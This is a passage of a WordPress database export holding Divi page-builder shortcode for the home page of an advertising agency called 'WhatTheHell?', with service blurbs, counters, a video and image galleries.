button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:40:29','2020-07-09 20:40:29','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(300,1,'2020-07-09 20:46:59','2020-07-09 20:46:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" 